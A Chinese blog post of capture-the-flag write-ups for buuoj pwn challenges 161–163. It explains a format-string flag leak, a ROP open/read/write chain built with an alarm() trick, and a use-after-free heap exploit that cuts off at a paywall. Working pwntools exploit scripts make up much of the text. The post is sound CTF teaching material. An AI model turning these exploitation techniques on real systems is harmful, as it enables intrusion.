buuoj Pwn writeup 161-165

最新推荐文章于 2022-07-04 22:57:08 发布
原创 最新推荐文章于 2022-07-04 22:57:08 发布 · 457 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

161 picoctf_2018_echooo

在这里插入图片描述

在这里插入图片描述就是格式化字符串 flag被读到了栈上,直接泄露就行。

# -*- coding: utf-8 -*-
from pwn import *

context.log_level = "debug"

r = remote('node3.buuoj.cn',25088)

offset=11

flag=''

for i in range(27,27+11):
    payload='%{}$p'.format(str(i))
    r.sendlineafter('> ',payload)
    s = unhex(r.recvuntil('\n',drop=True).replace('0x',''))
    #unhex转成字符串
    flag += s[::-1]
    #反转

print flag

162 warmup

在这里插入图片描述
在这里插入图片描述
有个溢出。

有这个溢出之后我们发现,利用比较困难,泄露libc溢出长度不够,也不能写shellcode啥的,那咋整。

我们发现里面有read,有write。
然后感觉有个open可以直接orw,那么open咋来?
我们发现了一个比较奇怪的东西……

在这里插入图片描述有个alarm,搜一下alarm是干嘛的。

成功:如果调用此alarm()前,进程已经设置了闹钟时间,则返回上一个闹钟时间的剩余时间,否则返回0。

因为他先alarm了10s,那么我们如果再alarm5s,那么eax的值就会是5,然后就可以通过syscall来调用open,从而实现orw。

# -*- coding: utf-8 -*-
from pwn import *
 
r = remote('node3.buuoj.cn',26855)

vuln_addr = 0x0804815A
read_addr = 0x0804811D
write_addr = 0x08048135
data = 0x08049200
syscall = 0x0804813A
alarm_addr = 0x804810d

payload = 'a'*0x20 + p32(read_addr) + p32(vuln_addr) + p32(0) + p32(data) + p32(0x10)
r.sendafter('Welcome to 0CTF 2016!',payload)
r.sendafter('Good Luck!','/flag'.ljust(0x10,'\x00'))

sleep(5)
#关键就在这了

payload = 'a'*0x20 + p32(alarm_addr) + p32(syscall) + p32(vuln_addr) + p32(data) + p32(0)
r.send(payload)

payload = 'a'*0x20 + p32(read_addr) + p32(vuln_addr) + p32(3) + p32(data) + p32(0x30)
r.sendafter('Good Luck!',payload)

payload = 'a'*0x20 + p32(write_addr) + p32(0) + p32(1) + p32(data) + p32(0x30)
r.sendafter('Good Luck!',payload)
 
r.interactive()

163 ciscn_2019_final_4

在这里插入图片描述
保护只有PIE没开,我们来一起读程序。

在这里插入图片描述
刚进来就碰到了奇怪的东西,我们知道调试手段是通过ptrace打断点,Ptrace 提供了一种父进程可以控制子进程运行,并可以检查和改变它的核心image。它主要用于实现断点调试。一个被跟踪的进程运行中,直到发生一个信号。则进程被中止,并且通知其父进程。在进程中止的状态下,进程的内存空间可以被读写。父进程还可以使子进程继续执行,并选择是否是否忽略引起中止的信号。
但是程序用了反调试手段,将调试的子进程直接杀死,所以导致我们不能调试,不能调试怎么打pwn。
所以我们的手段是将它patch掉。

在这里插入图片描述
在这里插入图片描述直接call过去。

我们参考大佬的做法,把它写成jmp $+0x9e,这句话的意思是跳转到0x9e之后,我们怎么知道它的字节码呢,用到pwntools。

在这里插入图片描述
然后在这里一个字节一个字节改
在这里插入图片描述

然后就好了。
在这里插入图片描述
在这里插入图片描述

反汇编也就啥都没有了 非常的神奇。

在这里插入图片描述
然后记得把改好的文件保存一下,就可以拿去调试了。

在这里插入图片描述
开了沙箱。

在这里插入图片描述普普通通new函数。

在这里插入图片描述uaf有些明显。

在这里插入图片描述
普普通通输出函数。

漏洞很简单,是简简单单的uaf,但是问题是开了沙箱,问题是我们怎么利用uaf来orw。
所以我们的想法是能够alloc stack,在栈上写一段rop,来实现orw来getshell。

我们的做法是首先当然是泄露libc地址,这个申请释放一个大小合适的chunk就可以办得到。我们说有检查,会检查分配chunk的size位是否合法,我们可以通过借助申请chunk时填写的size来伪造。

double free控制到note这个地方,因为想泄露栈地址,将某个note处的地址改成__environ,从而泄露栈地址。
在这里插入图片描述
接下来就是再次double free,在栈上找到合适的数据,将chunk申请到stack上,从而泄露canary。
在这里插入图片描述
接下来就是还是double free,来写rop,因为我们的chunk是有限的,而orw的rop又会比较长,所以我们要分两步来写,第一次写一个read,来读长度足够的rop。
我们把这个rop写在了main函数后面。

最后再次double free,来劫持new函数到main函数后面,从而执行rop链。

#coding:utf8
from pwn import *

context.log_level = "debug"

r = process("./163")
libc = ELF('/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
       
fake_chunk = p64(0) + p64(0x81)
payload = 'a'*0xE8 + fake_chunk
r.sendafter('what is your name?',payload)
 
def add(size,content):
   r.sendlineafter(
最低0.47元/天 解锁文章
buuoj Pwn writeup 201-205
yongbaoii的博客
08-31 585
201 bbctf_2020_write canary是没有开的。环境是2.27的一个环境。 可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。 又给出了一个栈地址,我们考虑可以直接去劫持got表,但是发现got表不能写。 那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。 exit没有hook,我们考虑怎么能把exit劫持掉。 劫持exit 简单点说就是。 exit()->__run_exit_handlers->_dl_fini->_
buuoj Pwn writeup 126-130
yongbaoii的博客
05-11 361
126 护网杯_2018_gettingstart 保护 程序就这么点,逻辑也简单。 然后有个栈溢出。 然后就修改修改就好了嘛,把v7改成0x7fffffffffffffff,v8改成0.1 exp from pwn import* r = remote("node3.buuoj.cn", 28793) #r = process("./126") payload = 'a' * 0x18 + p64(0x7fffffffffffffff) + p64(0x3FB999999999999A) r.re
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 533
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 590
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 354
buuctf-pwn 017-026题wp,重点关注babyheap
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 383
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
buuoj Pwn writeup 171-175
yongbaoii的博客
06-09 433
171 wdb_2018_1st_babyheap add edit 只能编辑三次。 show free 简单的uaf。 我们可以通过unlink来泄露地址,劫持free_hook。 要注意的是它自己写的一个输入函数。 要么就回车截断,要么就输入32个。所以我们在写exp的时候如果是32字节,就不要加回车,如果不够32个字节,就一定要加回车,不然输入是截断不了的。 先通过double free泄露地址,然后把heap_base + 0x10的chunk申请到。并且把heap_base再挂进去。 将h
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3465
前言 开始刷一刷Buuctf的PWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 347
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 346
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1224
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 316
buuctf-pwn 067~072题题解
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 1047
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 660
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 657
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2213
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 787
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
[BUUCTF-pwn]——x_ctf_b0verfl0w
Y_peak的博客
03-27 782
[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型,利用栈溢出,构造循环调用 第一次leek地址,之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug
PWN G21.5-0.9脉冲星云光谱分析结果发布
在天文学领域,脉冲星云(Pulsar Wind Nebula,简称PWN)是一种特别的天体现象,它是由高速旋转的脉冲星释放出的粒子风与周围介质相互作用形成的高能辐射云。脉冲星是中子星的一种,它们自转极快,能够周期性地发出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值